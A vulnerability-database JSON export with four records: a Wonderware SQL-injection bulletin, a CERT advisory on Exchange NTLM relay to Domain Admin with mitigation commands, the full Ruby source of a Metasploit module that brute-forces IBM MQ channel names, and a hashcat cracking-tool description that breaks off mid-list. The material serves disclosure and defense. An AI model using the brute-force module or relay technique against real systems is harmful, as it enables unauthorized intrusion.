{"hash": "404a8eae8b4c4866572259f7ce60af642725542ec60481744b9aa4ba351a4502", "id": "PT-2013-38", "lastseen": "2017-03-22T08:11:18", "viewCount": 5, "hashmap": [{"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "f9d4366affa0b178e6beac960f003c7e", "key": "cvss"}, {"hash": "46a35032d17ad25dce26e5469bc8600d", "key": "description"}, {"hash": "515e2c8f8c60eaeb926df96415a9d353", "key": "href"}, {"hash": "b76e691a9976ce5eee364c5f0ff987ff", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "ptsecurityAffected"}, {"hash": "cfa32998a4456c9feed93d3f61c3bd1b", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "e99869b3dd8438b5ae343e064e0d1682", "key": "reporter"}, {"hash": "eb3285a55e968c1f3f9d8ea28922cb4d", "key": "title"}, {"hash": "615e7c0edc6477f08a3e170761453c2b", "key": "type"}], "bulletinFamily": "info", "cvss": {"score": "9.3", "vector": "AV:NONEETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE) </div>"}, "edition": 3, "ptsecurityAffected": [], "type": "ptsecurity", "description": "PT-2013-38: Multiple SQL Injection vulnerabilities in Wonderware Information Server\n\nFix date:\n\n April 23, 2013\n \n\nVector:\nRemote\n\nSystems affected:\nWonderware Information Server 5.xWonderware Information Server 4.x\n\nVendor:\nInvensys Systems\n\nNotification status:\n16.12.2012 - Vendor gets vulnerabilities details\n23.04.2013 - Vendor releases fixed version and details\n10.06.2013 - Public disclosure", "title": "Multiple SQL Injection vulnerabilities in Wonderware Information Server", "history": [{"bulletin": {"hash": "5d4d5901576c2285808476291979d5def1e8d70caa9a2564a1b1df707c9106b6", "viewCount": 0, "edition": 2, "lastseen": "2016-10-25T09:30:02", "history": [], "objectVersion": "1.2", "hashmap": [{"hash": "4e3f1d4a960fb8756f9c5ecf284cdf82", "key": "ptsecurityAffected"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "3ed50c62b1805706252d797bb65c9478", "key": "href"}, {"hash": "8d482d603c6ec89716dd2cd500afae1b", "key": "description"}, {"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "b76e691a9976ce5eee364c5f0ff987ff", "key": "published"}, {"hash": "b76e691a9976ce5eee364c5f0ff987ff", "key": "modified"}, {"hash": "615e7c0edc6477f08a3e170761453c2b", "key": "type"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "eb3285a55e968c1f3f9d8ea28922cb4d", "key": "title"}, {"hash": "e99869b3dd8438b5ae343e064e0d1682", "key": "reporter"}], "cvelist": [], "bulletinFamily": "info", "published": "2013-06-10T00:00:00", "description": "PT-2013-38: Multiple SQL Injection vulnerabilities in Wonderware Information Server\n\nhigh\nSeverity:\nHigh (9.3)\t(AV:N/AC:M/Au:N/C:C/I:C/A:C)\n\nFix date:\n23.04.2013\n\nVector:\nRemote\n\nSystems affected:\nWonderware Information Server 5.xWonderware Information Server 4.x\n\nVendor:\nInvensys Systems\n\nNotification status:\n16.12.2012 - Vendor gets vulnerabilities details\n23.04.2013 - Vendor releases fixed version and details\n10.06.2013 - Public disclosure", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "id": "PT-2013-38", "reporter": "Positive Technologies", "references": [], "title": "Multiple SQL Injection vulnerabilities in Wonderware Information Server", "modified": "2013-06-10T00:00:00", "ptsecurityAffected": ["Wonderware Information Server 4.x", "Wonderware Information Server 5.x"], "href": "https://www.ptsecurity.com/research/threatscape/", "type": "ptsecurity"}, "lastseen": "2016-10-25T09:30:02", "edition": 2, "differentElements": ["cvss", "description", "published", "href", "ptsecurityAffected"]}, {"bulletin": {"hash": "a1451e4e438184aaffcefe3a4e6befcc035cf0672fbcb26ac4c2c1db96faca1a", "viewCount": 0, "edition": 1, "lastseen": "2016-09-26T19:17:33", "history": [], "objectVersion": "1.2", "hashmap": [{"hash": "4e3f1d4a960fb8756f9c5ecf284cdf82", "key": "ptsecurityAffected"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "8d482d603c6ec89716dd2cd500afae1b", "key": "description"}, {"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "b76e691a9976ce5eee364c5f0ff987ff", "key": "published"}, {"hash": "b76e691a9976ce5eee364c5f0ff987ff", "key": "modified"}, {"hash": "b1fbbef68be11e07d6cb981fddf15080", "key": "href"}, {"hash": "615e7c0edc6477f08a3e170761453c2b", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "eb3285a55e968c1f3f9d8ea28922cb4d", "key": "title"}, {"hash": "e99869b3dd8438b5ae343e064e0d1682", "key": "reporter"}, {"hash": "c08a06f1cadfd4e7d5d47deb1e8e0a93", "key": "cvss"}], "cvelist": [], "bulletinFamily": "info", "published": "2013-06-10T00:00:00", "description": "PT-2013-38: Multiple SQL Injection vulnerabilities in Wonderware Information Server\n\nhigh\nSeverity:\nHigh (9.3)\t(AV:N/AC:M/Au:N/C:C/I:C/A:C)\n\nFix date:\n23.04.2013\n\nVector:\nRemote\n\nSystems affected:\nWonderware Information Server 5.xWonderware Information Server 4.x\n\nVendor:\nInvensys Systems\n\nNotification status:\n16.12.2012 - Vendor gets vulnerabilities details\n23.04.2013 - Vendor releases fixed version and details\n10.06.2013 - Public disclosure", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "id": "PT-2013-38", "reporter": "Positive Technologies", "references": [], "title": "Multiple SQL Injection vulnerabilities in Wonderware Information Server", "modified": "2013-06-10T00:00:00", "ptsecurityAffected": ["Wonderware Information Server 4.x", "Wonderware Information Server 5.x"], "href": "http://www.ptsecurity.com/research/threatscape/", "type": "ptsecurity"}, "lastseen": "2016-09-26T19:17:33", "edition": 1, "differentElements": ["href"]}], "objectVersion": "1.2", "cvelist": [], "published": "2012-12-16T00:00:00", "references": [], "reporter": "Positive Technologies", "modified": "2013-06-10T00:00:00", "href": "https://www.ptsecurity.com/ww-en/analytics/threatscape/", "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:438679451792979314", "KITPLOIT:6422486000446318290"]}, {"type": "zdt", "idList": ["1337DAY-ID-30064", "1337DAY-ID-28632", "1337DAY-ID-24453", "1337DAY-ID-21485"]}, {"type": "hackapp", "idList": ["HACKAPP:COM.GLU.GLADIATOR.APK"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310123527", "OPENVAS:1361412562310850612", "OPENVAS:1361412562310803866", "OPENVAS:1361412562310803438", "OPENVAS:1361412562310803222"]}, {"type": "nessus", "idList": ["OPENSUSE-2014-540.NASL", "DEBIAN_DSA-2788.NASL", "DEBIAN_DSA-2699.NASL"]}, {"type": "ciscothreats", "idList": ["CISCO-THREAT-32261", "CISCO-THREAT-28320"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2759-1:3FC95"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/LOCAL/S4U_PERSISTENCE"]}, {"type": "exploitdb", "idList": ["EDB-ID:24453"]}], "modified": "2017-03-22T08:11:18"}, "vulnersScore": 5.0}}

{"cert": [{"lastseen": "2019-05-01T19:51:38", "bulletinFamily": "info", "description": "### Overview \n\nMicrosoft Exchange 2013 and newer fail to set signing and sealing flags on NTLM authentication traffic, which can allow a remote attacker to gain the privileges of the Exchange server.\n\n### Description \n\nMicrosoft Exchange supports a API called [Exchange Web Services](<https://docs.microsoft.com/en-us/previous-versions/office/developer/exchange-server-2010/dd877045\\(v%3Dexchg.140\\)>) (EWS). One of the EWS API functions is called [PushSubscriptionRequest](<https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/pushsubscriptionrequest>), which can be used to cause the Exchange server to connect to an arbitrary website. Connections made using the PushSubscriptionRequest function will attempt to negotiate with the arbitrary web server using NTLM authentication. Starting with Microsoft Exchange 2013, the NTLM authentication over HTTP fails to set the NTLM [Sign](<https://msdn.microsoft.com/en-us/library/cc236707.aspx>) and [Seal](<https://msdn.microsoft.com/en-us/library/cc236707.aspx>) flags. The lack of signing makes this authentication attempt vulnerable to NTLM relay attacks.\n\nMicrosoft Exchange is by default configured with extensive privileges with respect to the Domain object in Active Directory. Because the Exchange Windows Permissions group has WriteDacl access to the Domain object, this means that the Exchange server privileges obtained using this vulnerability can be used to gain Domain Admin privileges for the domain that contains the vulnerable Exchange server. \n \n--- \n \n### Impact \n\nAn attacker that has credentials for an Exchange mailbox and also has the ability to communicate with both a Microsoft Exchange server and a Windows domain controller may be able to gain domain administrator privileges. It is also reported that an attacker without knowledge of an Exchange user's password may be able to perform the same attack by using an SMB to HTTP relay attack as long as they are in the same network segment as an Exchange user. \n \n--- \n \n### Solution \n\n**Apply an update** \n \nThis issue is mitigated by the[ Microsoft Exchange updates for CVE-2019-0686](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0686>). This update will cause the Exchange server to not attempt NTLM authentication with hosts that it contacts as the result of a PushSubscriptionRequest API call. The versions of Exchange that contain this fix include:\n\n * Exchange Server 2010 Service Pack 3 Update Rollup 26\n * Exchange Server 2013 Cumulative Update 22\n * Exchange Server 2016 Cumulative Update 12\n * Exchange Server 2019 Cumulative Update 1\n \nThese updates also include the [fix for CVE-2019-0724](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0724>), which removes some of the unnecessary privileges that are granted to an Exchange server in a default installation. This is a defense-in-depth update that can help mitigate the impact of exploitation of this vulnerability. \n--- \n \n**Disable EWS push/pull subscriptions** \n \nIf you have an exchange server that does not leverage EWS push/pull subscriptions, you can block the PushSubscriptionRequest API call that triggers this attack. In an Exchange Management Shell window, execute the following commands:\n\n`New-ThrottlingPolicy -Name NoEWSSubscription -ThrottlingPolicyScope Organization -EwsMaxSubscriptions 0` \n`Restart-WebAppPool -Name MSExchangeServicesAppPool` \n**Remove privileges that Exchange has on the domain object** \n \nPlease note that the following workaround was not developed by CERT and is not supported by Microsoft. Please test any workarounds in your environment to ensure that they work properly. \n \n<https://github.com/gdedrouas/Exchange-AD-Privesc/blob/master/DomainObject/Fix-DomainObjectDACL.ps1> is a PowerShell script that can be executed on either the Exchange Server or Domain Controller system. By default this script will check for vulnerable access control entries in the current active directory. When executed with Domain Admin privileges and the `-Fix` flag, this script will remove the ability for Exchange to write to the domain object. \n \nNote that if you encounter an error about Get-ADDomainController not being recognized, you will need to install and import the ActiveDirectory PowerShell module, and then finally run Fix-DomainObjectDACL.ps1 :\n\n`Import-Module ServerManager` \n`Add-WindowsFeature RSAT-AD-PowerShell` \n`Import-Module ActiveDirectory` \n`.\\Fix-DomainObjectDACL.ps1` \nIf the script reports that faulty ACE were found, run:\n\n`.\\``Fix-DomainObjectDACL.ps1 -Fix` \nPowerShell may be configured to block the execution of user-provided `.ps1` files. If this is the case, first find your current PowerShell execution policy:\n\n`Get-ExecutionPolicy`Temporarily allow the execution of the `Fix-DomainObjectDACL.ps1` script by running:\n\n`Set-ExecutionPolicy unrestricted`Once you are finished running the `Fix-DomainObjectDACL.ps1`script, set the policy back to the original value as reported by `Get-ExecutionPolicy`:\n\n`Set-ExecutionPolicy [POLICY]` \n**Consider additional workarounds** \n \nThe [blog post for this vulnerability](<https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/>) contains several mitigations that may also help protect against this and similar vulnerabilities. \n--- \n \n### Vendor Information\n\n465632\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ __ Microsoft\n\nNotified: January 26, 2019 Updated: February 20, 2019 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nMicrosoft is aware of this vulnerability and is working on a resolution\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV19000 7 https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019 -0686 https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019 -0724>\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 8.3 | AV:A/AC:L/Au:N/C:C/I:C/A:C \nTemporal | 7.5 | E:F/RL:W/RC:C \nEnvironmental | 7.5 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/>\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV190007>\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0686>\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0724>\n * <https://www.thezdi.com/blog/2018/12/19/an-insincere-form-of-flattery-impersonating-users-on-microsoft-exchange>\n * <https://docs.microsoft.com/en-us/dotnet/api/microsoft.exchange.webservices.data.pushsubscription?view=exchange-ews-api+>\n * <https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/pushsubscriptionrequest>\n * <https://docs.microsoft.com/en-us/previous-versions/office/developer/exchange-server-2010/dd877045(v%3Dexchg.140)>\n * <https://msdn.microsoft.com/en-us/library/cc236702.aspx>\n * <https://msdn.microsoft.com/en-us/library/cc236707.aspx>\n\n### Acknowledgements\n\nThis vulnerability was publicly disclosed by Dirk-jan Mollema. \n\nThis document was written by Will Dormann. \n\n### Other Information\n\n**CVE IDs:** | [CVE-2019-0686](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-0686>) \n---|--- \n**Date Public:** | 2019-01-21 \n**Date First Published:** | 2019-01-28 \n**Date Last Updated: ** | 2019-02-20 21:06 UTC \n**Document Revision: ** | 43 \n", "modified": "2019-02-20T21:06:00", "published": "2019-01-28T00:00:00", "id": "VU:465632", "href": "https://www.kb.cert.org/vuls/id/465632", "type": "cert", "title": "Microsoft Exchange server 2013 and newer are vulnerable to NTLM relay attacks", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2019-04-10T18:04:59", "bulletinFamily": "exploit", "description": "This module uses a dictionary to bruteforce MQ channel names. For all identified channels it also returns if SSL is used and whether it is a server-connection channel.", "modified": "2018-11-20T22:24:17", "published": "2018-10-28T15:22:27", "id": "MSF:AUXILIARY/SCANNER/MISC/IBM_MQ_CHANNEL_BRUTE", "href": "", "type": "metasploit", "title": "IBM WebSphere MQ Channel Name Bruteforce", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'IBM WebSphere MQ Channel Name Bruteforce',\n 'Description' => 'This module uses a dictionary to bruteforce MQ channel names. For all identified channels it also returns if SSL is used and whether it is a server-connection channel.',\n 'Author' => 'Petros Koutroumpis',\n 'License' => MSF_LICENSE\n )\n register_options([\n Opt::RPORT(1414),\n OptInt.new('TIMEOUT', [true, \"The socket connect timeout in seconds\", 10]),\n OptInt.new('CONCURRENCY', [true, \"The number of concurrent channel names to check\", 10]),\n OptPath.new('CHANNELS_FILE',\n [ true, \"The file that contains a list of channel names\"]\n )])\n end\n\n def create_packet(chan)\n packet = \"\\x54\\x53\\x48\\x20\"+ \t# StructID\n \"\\x00\\x00\\x01\\x0c\"+ \t\t# MQSegmLen\n \"\\x02\" +\t\t\t \t# Byte Order\n \"\\x01\" +\t\t\t \t# SegmType\n \"\\x01\" +\t\t\t\t# CtlFlag1\n \"\\x00\" +\t\t\t\t# CtlFlag2\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+\t# LUWIdent\n \"\\x22\\x02\\x00\\x00\"+\t\t\t# Encoding\n \"\\xb5\\x01\" +\t\t\t# CCSID\n \"\\x00\\x00\" +\t\t\t# Reserved\n \"\\x49\\x44\\x20\\x20\" +\t\t# StructID\n \"\\x0d\" +\t\t\t\t# FAP Level\n \"\\x26\" +\t\t\t\t# CapFlag1 - Channel Type\n \"\\x00\" +\t\t\t\t# ECapFlag1\n \"\\x00\" +\t\t\t\t# IniErrFlg1\n \"\\x00\\x00\" +\t\t\t# Reserved\n \"\\x32\\x00\" +\t\t\t# MaxMsgBtch\n \"\\xec\\x7f\\x00\\x00\" +\t\t# MaxTrSize\n \"\\x00\\x00\\x40\\x00\" +\t\t# MaxMsgSize\n \"\\xff\\xc9\\x9a\\x3b\" +\t\t# SegWrapVal\n + chan + \t\t\t\t# Channel name\n \"\\x20\" +\t\t\t\t# CapFlag2\n \"\\x20\" +\t\t\t\t# ECapFlag2\n \"\\x20\\x20\" +\t\t\t# ccsid\n \"QM1\" + \"\\x20\"*45 +\t\t\t# Queue Manager Name\n \"\\x20\\x20\\x20\\x20\" +\t\t# HBInterval\n \"\\x20\\x20\" +\t\t\t# EFLLength\n \"\\x20\" +\t\t\t\t# IniErrFlg2\n \"\\x20\" +\t\t\t\t# Reserved1\n \"\\x20\\x20\" +\t\t\t# HdrCprLst\n \"\\x20\\x20\\x20\\x20\\x2c\\x01\\x00\\x00\"+ # MSGCprLst1\n \"\\x8a\\x00\\x00\\x55\\x00\\xff\\x00\\xff\"+ # MsgCprLst2\n \"\\xff\\xff\" +\t\t\t# Reserved2\n \"\\xff\\xff\\xff\\xff\" +\t\t# SSLKeyRst\n \"\\xff\\xff\\xff\\xff\" +\t\t# ConvBySKt\n \"\\xff\" +\t\t\t\t# CapFlag3\n \"\\xff\" +\t\t\t\t# ECapFlag3\n \"\\xff\\xff\" +\t\t\t# Reserved3\n \"\\x00\\x00\\x00\\x00\" +\t\t# ProcessId\n \"\\x00\\x00\\x00\\x00\" +\t\t# ThreadId\n \"\\x00\\x00\\x05\\x00\" +\t\t# TraceId\n \"\\x00\\x00\\x10\\x13\\x00\\x00\" + \t# ProdId\n \"\\x01\\x00\\x00\\x00\\x01\\x00\" + \t# ProdId\n \"MQMID\" + \"\\x20\"*43 +\t\t# MQM Id\n \"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\"+ # Unknown\n \"\\x20\\x20\\x20\\x20\\x20\\x20\\x00\\x00\"+ # Unknown\n \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\"+ # Unknown\n \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\"+ # Unknown\n \"\\xff\\xff\\x00\\x00\\x00\\x00\\x00\\x00\"+ # Unknown\n \"\\x00\\x00\\x00\\x00\\x00\\x00\"\t\t# Unknown\n end\n\n\n def run_host(ip)\n @channels = []\n @unencrypted_mqi_channels = []\n begin\n channel_list\n rescue ::Rex::ConnectionRefused\n fail_with(Failure::Unreachable, \"TCP Port closed.\")\n rescue ::Rex::ConnectionError, ::IOError, ::Timeout::Error, Errno::ECONNRESET\n fail_with(Failure::Unreachable, \"Connection Failed.\")\n rescue ::Exception => e\n fail_with(Failure::Unknown, e)\n end\n if(@channels.empty?)\n print_status(\"#{ip}:#{rport} No channels found.\")\n else\n print_good(\"Channels found: #{@channels}\")\n print_good(\"Unencrypted MQI Channels found: #{@unencrypted_mqi_channels}\")\n report_note(\n :host => rhost,\n :port => rport,\n :type => 'mq.channels'\n )\n print_line\n end\n end\n\n def channel_list\n channel_data = get_channel_names\n while (channel_data.length > 0)\n t = []\n r = []\n begin\n 1.upto(datastore['CONCURRENCY']) do\n this_channel = channel_data.shift\n if this_channel.nil?\n next\n end\n t << framework.threads.spawn(\"Module(#{self.refname})-#{rhost}:#{rport}\", false, this_channel) do |channel|\n connect\n vprint_status \"#{rhost}:#{rport} - Sending request for #{channel}...\"\n if channel.length.to_i > 20\n print_error(\"Channel names cannot exceed 20 characters. Skipping.\")\n next\n end\n chan = channel + \"\\x20\"*(20-channel.length.to_i)\n timeout = datastore['TIMEOUT'].to_i\n s = connect(false,\n {\n 'RPORT' => rport,\n 'RHOST' => rhost,\n }\n )\n s.put(create_packet(chan))\n data = s.get_once(-1,timeout)\n if data.nil?\n print_status(\"No response received. Try increasing timeout.\")\n next\n end\n if not data[0...3].include? 'TSH'\n next\n end\n if data[-4..-1] == \"\\x01\\x00\\x00\\x00\" # NO_CHANNEL code\n next\n end\n if data[-4..-1] == \"\\x18\\x00\\x00\\x00\" # CIPHER_SPEC code\n print_status(\"Found channel: #{channel}, IsEncrypted: True, IsMQI: N/A\")\n elsif data[-4..-1] == \"\\x02\\x00\\x00\\x00\" # CHANNEL_WRONG_TYPE code\n print_status(\"Found channel: #{channel}, IsEncrypted: False, IsMQI: False\")\n else\n print_status(\"Found channel: #{channel}, IsEncrypted: False, IsMQI: True\")\n @unencrypted_mqi_channels << channel\n end\n @channels << channel\n disconnect\n end\n end\n t.each {|x| x.join }\n end\n end\n end\n\n def get_channel_names\n if(! @common)\n File.open(datastore['CHANNELS_FILE'], \"rb\") do |fd|\n data = fd.read(fd.stat.size)\n @common = data.split(/\\n/).compact.uniq\n end\n end\n @common\n end\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/misc/ibm_mq_channel_brute.rb"}], "kitploit": [{"lastseen": "2018-10-26T03:31:44", "bulletinFamily": "tools", "description": "[  ](<https://3.bp.blogspot.com/-uTZhOMZqPSI/W20S1FfxTzI/AAAAAAAAMHI/tTFVZ3FLYK0-qmEQR270oIXyqyx-5s-ZgCLcBGAs/s1600/hashcat.png>)\n\n \n\n\n** hashcat ** is the world's fastest and most advanced password recovery utility, supporting five unique modes of attack for over 200 highly-optimized hashing algorithms. hashcat currently supports CPUs, GPUs, and other hardware accelerators on Linux, Windows, and OSX, and has facilities to help enable distributed password cracking. \n\n \n\n\n** Installation **\n\nDownload the [ latest release ](<https://hashcat.net/hashcat/>) and unpack it in the desired location. Please remember to use ` 7z x ` when unpacking the archive from the command line to ensure full file paths remain intact. \n\n \n\n\nGPU Driver requirements: \n\n * AMD GPUs on Windows require \"AMD Radeon Software Crimson Edition\" (15.12 or later) \n * AMD GPUs on Linux require \"AMDGPU-PRO Driver\" (16.40 or later) \n * Intel CPUs require \"OpenCL Runtime for Intel Core and Intel Xeon Processors\" (16.1.1 or later) \n * Intel GPUs on Windows require \"OpenCL Driver for Intel Iris and Intel HD Graphics\" \n * Intel GPUs on Linux require \"OpenCL 2.0 GPU Driver Package for Linux\" (2.0 or later) \n * NVIDIA GPUs require \"NVIDIA Driver\" (367.x or later) \n\n \n\n\n## Features \n\n * World's fastest password cracker \n * World's first and only in-kernel rule engine \n * ** Free **\n * ** Open-Source (MIT License) **\n * Multi-OS (Linux, Windows and OSX) \n * Multi-Platform (CPU, GPU, DSP, FPGA, etc., everything that comes with an OpenCL runtime) \n * Multi-Hash (Cracking multiple hashes at the same time) \n * Multi-Devices (Utilizing multiple devices in same system) \n * Multi-Device-Types (Utilizing mixed device types in same system) \n * Supports distributed cracking ** networks ** (using overlay) \n * Supports ** interactive ** pause / resume \n * Supports sessions \n * Supports restore \n * Supports reading password candidates from file and stdin \n * Supports hex-salt and hex-charset \n * Supports automatic ** performance ** tuning \n * Supports automatic keyspace ordering markov-chains \n * Built-in benchmarking system \n * Integrated thermal ** watchdog **\n * ** [ 200+ Hash-types ](<https://hashcat.net/hashcat/#features-algos>) ** implemented with performance in mind \n * ... ** and much more **\n\n** \n**\n\n## Algorithms \n\n * MD4 \n * MD5 \n * Half MD5 (left, mid, right) \n * SHA1 \n * SHA-224 \n * SHA-256 \n * SHA-384 \n * SHA-512 \n * SHA-3 (Keccak) \n * BLAKE2b-512 \n * SipHash \n * Skip32 \n * RIPEMD-160 \n * Whirlpool \n * DES (PT = $salt, key = $pass) \n * 3DES (PT = $salt, key = $pass) \n * ChaCha20 \n * GOST R 34.11-94 \n * GOST R 34.11-2012 (Streebog) 256-bit \n * GOST R 34.11-2012 (Streebog) 512-bit \n * md5($pass.$salt) \n * md5($salt.$pass) \n * md5(unicode($pass).$salt) \n * md5($salt.unicode($pass)) \n * md5($salt.$pass.$salt) \n * md5($salt.md5($pass)) \n * md5($salt.md5($salt.$pass)) \n * md5($salt.md5($pass.$salt)) \n * md5(md5($pass)) \n * md5(md5($pass).md5($salt)) \n * md5(strtoupper(md5($pass))) \n * md5(sha1($pass)) \n * sha1($pass.$salt) \n * sha1($salt.$pass) \n * sha1(unicode($pass).$salt) \n * sha1($salt.unicode($pass)) \n * sha1(sha1($pass)) \n * sha1($salt.sha1($pass)) \n * sha1(md5($pass)) \n * sha1($salt.$pass.$salt) \n * sha1(CX) \n * sha256($pass.$salt) \n * sha256($salt.$pass) \n * sha256(unicode($pass).$salt) \n * sha256($salt.unicode($pass)) \n * sha512($pass.$salt) \n * sha512($salt.$pass) \n * sha512(unicode($pass).$salt) \n * sha512($salt.unicode($pass)) \n * HMAC-MD5 (key = $pass) \n * HMAC-MD5 (key = $salt) \n * HMAC-SHA1 (key = $pass) \n * HMAC-SHA1 (key = $salt) \n * HMAC-SHA256 (key = $pass) \n * HMAC-SHA256 (key = $salt) \n * HMAC-SHA512 (key = $pass) \n * HMAC-SHA512 (key = $salt) \n * PBKDF2-HMAC-MD5 \n * PBKDF2-HMAC-SHA1 \n * PBKDF2-HMAC-SHA256 \n * PBKDF2-HMAC-SHA512 \n * MyBB \n * phpBB3 \n * SMF (Simple Machines Forum) \n * vBulletin \n * IPB (Invision Power Board) \n * WBB (Woltlab Burning Board) \n * osCommerce \n * xt:Commerce \n * PrestaShop \n * MediaWiki B type \n * WordPress \n * Drupal 7 \n * Joomla \n * PHPS \n * Django (SHA-1) \n * Django (PBKDF2-SHA256) \n * Episerver \n * ColdFusion 10+ \n * Apache MD5-APR \n * MySQL \n * PostgreSQL \n * MSSQL \n * Oracle H: Type (Oracle 7+) \n * Oracle S: Type (Oracle 11+) \n * Oracle T: Type (Oracle 12+) \n * Sybase \n * hMailServer \n * DNSSEC (NSEC3) \n * IKE-PSK \n * IPMI2 RAKP \n * iSCSI CHAP \n * CRAM-MD5 \n * MySQL CRAM (SHA1) \n * PostgreSQL CRAM (MD5) \n * SIP digest authentication (MD5) \n * WPA/WPA2 \n * WPA/WPA2 PMK \n * NetNTLMv1 \n * NetNTLMv1+ESS \n * NetNTLMv2 \n * Kerberos 5 AS-REQ Pre-Auth etype 23 \n * Kerberos 5 TGS-REP etype 23 \n * Netscape LDAP SHA/SSHA \n * FileZilla Server \n * LM \n * NTLM \n * Domain Cached Credentials (DCC), MS Cache \n * Domain Cached Credentials 2 (DCC2), MS Cache 2 \n * DPAPI masterkey file v1 and v2 \n * MS-AzureSync PBKDF2-HMAC-SHA256 \n * descrypt \n * bsdicrypt \n * md5crypt \n * sha256crypt \n * sha512crypt \n * bcrypt \n * scrypt \n * macOS v10.4 \n * macOS v10.5 \n * macOS v10.6 \n * macOS v10.7 \n * macOS v10.8 \n * macOS v10.9 \n * macOS v10.10 \n * iTunes backup &lt; 10.0 \n * iTunes backup &gt;= 10.0 \n * AIX {smd5} \n * AIX {ssha1} \n * AIX {ssha256} \n * AIX {ssha512} \n * Cisco-ASA MD5 \n * Cisco-PIX MD5 \n * Cisco-IOS $1$ (MD5) \n * Cisco-IOS type 4 (SHA256) \n * Cisco $8$ (PBKDF2-SHA256) \n * Cisco $9$ (scrypt) \n * Juniper IVE \n * Juniper NetScreen/SSG (ScreenOS) \n * Juniper/NetBSD sha1crypt \n * Fortigate (FortiOS) \n * Samsung Android Password/PIN \n * Windows Phone 8+ PIN/password \n * GRUB 2 \n * CRC32 \n * RACF \n * Radmin2 \n * Redmine \n * PunBB \n * OpenCart \n * Atlassian (PBKDF2-HMAC-SHA1) \n * Citrix NetScaler \n * SAP CODVN B (BCODE) \n * SAP CODVN F/G (PASSCODE) \n * SAP CODVN H (PWDSALTEDHASH) iSSHA-1 \n * PeopleSoft \n * PeopleSoft PS_TOKEN \n * Skype \n * WinZip \n * 7-Zip \n * RAR3-hp \n * RAR5 \n * AxCrypt \n * AxCrypt in-memory SHA1 \n * PDF 1.1 - 1.3 (Acrobat 2 - 4) \n * PDF 1.4 - 1.6 (Acrobat 5 - 8) \n * PDF 1.7 Level 3 (Acrobat 9) \n * PDF 1.7 Level 8 (Acrobat 10 - 11) \n * MS Office &lt;= 2003 MD5 \n * MS Office &lt;= 2003 SHA1 \n * MS Office 2007 \n * MS Office 2010 \n * MS Office 2013 \n * Lotus Notes/Domino 5 \n * Lotus Notes/Domino 6 \n * Lotus Notes/Domino 8 \n * Bitcoin/Litecoin wallet.dat \n * Blockchain, My Wallet \n * Blockchain, My Wallet, V2 \n * 1Password, agilekeychain \n * 1Password, cloudkeychain \n * LastPass \n * Password Safe v2 \n * Password Safe v3 \n * KeePass 1 (AES/Twofish) and KeePass 2 (AES) \n * JKS Java Key Store Private Keys (SHA1) \n * 